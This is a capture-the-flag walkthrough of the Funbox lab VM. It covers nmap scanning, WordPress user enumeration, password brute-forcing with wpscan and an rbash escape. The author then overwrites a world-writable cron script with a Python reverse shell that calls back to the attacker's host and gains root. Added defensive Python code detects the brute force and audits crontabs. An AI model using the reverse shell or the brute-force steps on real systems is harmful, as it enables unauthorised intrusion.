IP of the target : 192.168.1.13
As usual I started with an nmap scan to find open ports and services, using the command shown below:

```
nmap -sC -sV -Pn -p- -T4 --max-rate=1000 -o nmap.txt 192.168.1.13

Nmap scan report for funbox.lan (192.168.1.13)
Host is up (0.0014s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      ProFTPD
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp    open  ssl/http Apache/2.4.41 (Ubuntu)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/secret/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Funbox – Have fun….
33060/tcp open  mysqlx?
| fingerprint-strings:
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
|     Invalid message"
|_    HY000
```
Ports 21/FTP, 22/SSH, 80/HTTP and 3306/mysql are open. Anonymous login is not allowed for FTP, so let's move forward on port 80. Opening it in the browser gives the error "funbox.fritz.box's server IP address could not be found.", so I solved this problem by adding the host to the /etc/hosts file:

```
192.168.1.13 funbox.fritz.box

# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
```
Now I can access the web application, and by looking at the theme I was sure that this is "Just another WordPress website", so I started enumeration using wpscan.

```
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $ wpscan --url "http://funbox.fritz.box/" --enumerate u,vp
.
.
.
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://funbox.fritz.box/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] joe
 | Found By: Author Id Brute Forcing - Author Pattern
```
So I have two usernames. The next step is to brute-force the password for these users using the wordlist rockyou.txt.

```
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $ wpscan --url "http://funbox.fritz.box/" --passwords ../../rockyou.txt
.
.
.
[+] Performing password attack on Wp Login against 2 user/s
[SUCCESS] - joe / 12345
[SUCCESS] - admin / iubire
Trying admin / iubire Time: 00:00:12 < > (670 / 14344394) 0.00%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: joe, Password: 12345
 | Username: admin, Password: iubire
```
That's it, we found the admin user's password. We could log in to the admin panel and pop a reverse shell from there as user www-data, but wait: I first thought to try these credentials for SSH login, and yes, I was in as user joe.
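Both wpscan runs above leave an obvious trail in the web server's access log: a sweep of `?author=N` requests and a hit on the wp-json users endpoint, followed by a burst of POSTs to wp-login.php from one client. The following detector is an added example, not part of the original walkthrough; the Apache log lines it parses are constructed here to resemble that traffic (the IPs 10.0.0.9 and 10.0.0.20 and the user-agent strings are made up), and the window and threshold values are assumptions to tune for your site.

```python
"""Flag WordPress user enumeration and wp-login.php brute force in Apache logs.

Added example, not part of the original walkthrough. The access-log lines are
constructed to resemble the traffic the two wpscan runs generate: author-id
probing, the wp-json users listing and a burst of login POSTs. The client IPs
and user-agent strings are made up.
"""
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" format; only the fields the detector needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Request shapes that wpscan's user enumeration produces (see its output above).
ENUM_PATTERNS = (
    re.compile(r"^/\?author=\d+"),        # author-id brute forcing
    re.compile(r"/wp-json/wp/v2/users"),  # REST API user listing
)


def build_sample_log():
    """Constructed log: one scanner (10.0.0.9) and one ordinary visitor (10.0.0.20)."""
    lines = [
        '10.0.0.20 - - [21/Sep/2020:08:40:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
        '10.0.0.9 - - [21/Sep/2020:08:41:00 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan"',
        '10.0.0.9 - - [21/Sep/2020:08:41:00 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "WPScan"',
        '10.0.0.9 - - [21/Sep/2020:08:41:01 +0000] "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 812 "-" "WPScan"',
        '10.0.0.20 - - [21/Sep/2020:08:42:30 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    ]
    for sec in range(10, 22):  # twelve login attempts in twelve seconds
        lines.append(f'10.0.0.9 - - [21/Sep/2020:08:42:{sec:02d} +0000] '
                     '"POST /wp-login.php HTTP/1.1" 200 3210 "-" "WPScan"')
    return lines


def parse(lines):
    """Yield parsed records; lines that do not match the format are skipped."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
            yield rec


def max_in_window(stamps, window_s):
    """Largest number of timestamps falling inside any window_s-second span."""
    stamps = sorted(stamps)
    best = start = 0
    for i, t in enumerate(stamps):
        while (t - stamps[start]).total_seconds() > window_s:
            start += 1
        best = max(best, i - start + 1)
    return best


def detect(lines, window_s=60, threshold=10):
    """Return {ip: {"enumeration": [paths], "login_posts": n}} for suspicious clients."""
    enum_hits = defaultdict(set)
    login_ts = defaultdict(list)
    for rec in parse(lines):
        if any(p.search(rec["path"]) for p in ENUM_PATTERNS):
            enum_hits[rec["ip"]].add(rec["path"])
        if rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            login_ts[rec["ip"]].append(rec["ts"])
    findings = {}
    for ip in set(enum_hits) | set(login_ts):
        burst = max_in_window(login_ts[ip], window_s) if login_ts[ip] else 0
        if enum_hits[ip] or burst >= threshold:
            findings[ip] = {"enumeration": sorted(enum_hits[ip]), "login_posts": burst}
    return findings


if __name__ == "__main__":
    for ip, info in detect(build_sample_log()).items():
        print(ip, info)
```

Run against a real file with `detect(open("/var/log/apache2/access.log"))`. The scanner IP is reported with its three enumeration requests and twelve login POSTs inside one minute, while the visitor's single login is ignored. A real user almost never submits wp-login.php ten times in a minute, so the threshold mainly has to account for shared NAT addresses; the enumeration patterns are a strong signal on their own because ordinary browsing never requests `/?author=N` for consecutive IDs.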
```
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $ ssh firstname.lastname@example.org
email@example.com's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
```
Umm, that's nice. Next I started enumerating different directories, but I was unable to change directory: the cd /home command gave the error -rbash: cd: restricted. We have many ways to bypass this.

```
┌─[m4g1c14n@parrot]─[~/Desktop/HTB/fb1]
└──╼ $ ssh firstname.lastname@example.org -t "bash --noprofile"
email@example.com's password:
joe@funbox:~$ cd /home
joe@funbox:/home$
```
After some enumeration I found an interesting file in the /home/funny/ directory.

```
joe@funbox:/home/funny$ ls -al
total 47608
drwxr-xr-x 3 funny funny     4096 Jul 18 10:02 .
drwxr-xr-x 4 root  root      4096 Jun 19 11:50 ..
-rwxrwxrwx 1 funny funny       55 Jul 18 10:15 .backup.sh
-rw------- 1 funny funny     1462 Jul 18 10:07 .bash_history
-rw-r--r-- 1 funny funny      220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 funny funny     3771 Feb 25  2020 .bashrc
drwx------ 2 funny funny     4096 Jun 19 10:43 .cache
-rw-rw-r-- 1 funny funny 48701440 Sep 21 08:42 html.tar
-rw-r--r-- 1 funny funny      807 Feb 25  2020 .profile
-rw-rw-r-- 1 funny funny      162 Jun 19 14:13 .reminder.sh
-rw-rw-r-- 1 funny funny       74 Jun 19 12:25 .selected_editor
-rw-r--r-- 1 funny funny        0 Jun 19 10:44 .sudo_as_admin_successful
-rw------- 1 funny funny     7791 Jul 18 10:02 .viminfo
joe@funbox:/home/funny$ cat .reminder.sh
#!/bin/bash
echo "Hi Joe, the hidden backup.sh backups the entire webspace on and on. Ted, the new admin, test it in a long run." | mail -s"Reminder" joe@funbox
joe@funbox:/home/funny$
```
This message makes it clear that .backup.sh is being run as user funny, and the ls output shows the file is world-writable (-rwxrwxrwx). So in the next step I simply replaced the contents of .backup.sh with a reverse shell.

```
joe@funbox:/home/funny$ cat .backup.sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.103",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
After waiting for some time I got a shell as the funny user. After some more enumeration I couldn't find anything that would lead to root, so I terminated the current reverse shell and started listening again on the same port, and this time I got a shell as the root user.

```
┌─[m4g1c14n@parrot]─[~]
└──╼ $ nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.103] from (UNKNOWN) [192.168.1.13] 37192
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(funny) gid=1000(funny) groups=1000(funny),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
$ exit
```
Listening again on the same port:

```
┌─[m4g1c14n@parrot]─[~]
└──╼ $ nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.1.103] from (UNKNOWN) [192.168.1.13] 37194
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/flag.txt
Great ! You did it...
FUNBOX - made by @0815R2d2
```
And here is the actual catch of this machine.
NOTE: .backup.sh is run as a cron job. After gaining root access, I checked the crontabs of both users (funny and root) and found this:

This is for user funny:

```
root@funbox:~# crontab -u funny -l
.
.
.
*/2 * * * * /home/funny/.backup.sh
```
For user root:

```
root@funbox:~# crontab -u root -l
.
.
.
*/5 * * * * /home/funny/.backup.sh
```

So that's the reason I got a root shell by listening on the same port some time later: root's crontab runs the same world-writable script from funny's home directory every 5 minutes. I hope you like the walkthrough :)
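The root cause here is a cron entry pointing at a script that a less privileged user can change. The audit below is an added example, not part of the original walkthrough or the Funbox VM: it parses per-user crontab output (the format shown by `crontab -u <user> -l` above), stats each scheduled script and reports it when it is world-writable, sits in a world-writable directory, or is owned or group-writable by someone other than root or the cron user. The demo recreates the Funbox layout in a temporary directory with constructed file contents; the script body and the `safe.sh` companion are made up.

```python
"""Audit per-user crontabs for scheduled scripts that other users can modify.

Added example, not part of the original walkthrough. It reproduces the Funbox
misconfiguration in a temporary directory: a script with mode 777, owned by an
ordinary user, scheduled from root's crontab. The crontab text and the script
bodies are constructed here.
"""
import os
import stat
import tempfile
from dataclasses import dataclass


@dataclass
class Finding:
    cron_user: str
    schedule: str
    script: str
    reason: str


def parse_user_crontab(text):
    """Yield (schedule, command) pairs from `crontab -u <user> -l` output.

    Per-user crontabs have five time fields (or an @keyword) followed by the
    command; there is no user column as in /etc/crontab.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:            # environment assignment such as PATH=/usr/bin
            continue
        if first.startswith("@"):   # @reboot, @daily, ...
            parts, n = line.split(None, 1), 1
        else:
            parts, n = line.split(None, 5), 5
        if len(parts) == n + 1:
            yield " ".join(parts[:n]), parts[n]


def check_script(path, cron_uid, cron_gid):
    """Return why `path` is unsafe to run from that user's crontab, or None."""
    st = os.stat(path)
    parent = os.stat(os.path.dirname(path) or "/")
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        return "parent directory world-writable (file can be replaced)"
    if st.st_uid not in (0, cron_uid):
        return f"owned by uid {st.st_uid}, not root or the cron user"
    if st.st_mode & stat.S_IWGRP and st.st_gid not in (0, cron_gid):
        return f"writable by gid {st.st_gid}"
    return None


def audit(cron_user, cron_uid, cron_gid, crontab_text):
    """Findings for every absolute, existing script a crontab schedules."""
    findings = []
    for schedule, command in parse_user_crontab(crontab_text):
        path = command.split()[0]           # the executable cron will start
        if os.path.isabs(path) and os.path.exists(path):
            reason = check_script(path, cron_uid, cron_gid)
            if reason:
                findings.append(Finding(cron_user, schedule, path, reason))
    return findings


def demo():
    """Constructed Funbox-like layout; returns {script basename: reason}."""
    with tempfile.TemporaryDirectory() as home:
        backup = os.path.join(home, ".backup.sh")
        with open(backup, "w") as fh:
            fh.write("#!/bin/bash\ntar cf html.tar /var/www/html\n")  # hypothetical body
        os.chmod(backup, 0o777)                                        # the Funbox mistake
        safe = os.path.join(home, "safe.sh")
        with open(safe, "w") as fh:
            fh.write("#!/bin/bash\ntrue\n")
        os.chmod(safe, 0o755)
        root_tab = (
            "# m h dom mon dow command\n"
            f"*/5 * * * * {backup}\n"
            f"*/10 * * * * {safe}\n"
        )
        # root's crontab runs as uid 0 / gid 0
        return {os.path.basename(f.script): f.reason for f in audit("root", 0, 0, root_tab)}


if __name__ == "__main__":
    for name, reason in demo().items():
        print(f"{name}: {reason}")
```

On a live box you would feed it `subprocess.check_output(["crontab", "-u", "root", "-l"], text=True)` with root's uid and gid, and repeat for each user that has a crontab; the Funbox entry `*/5 * * * * /home/funny/.backup.sh` would be reported as world-writable, and even with mode 755 it would still be flagged because the file is owned by funny rather than root. The fix is the mirror image of the attack: keep scripts that root's cron runs under root-owned, non-writable paths such as /usr/local/sbin, never under another user's home directory.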
NOTE: The awesome artwork used in this article was created by Anton Fritsler.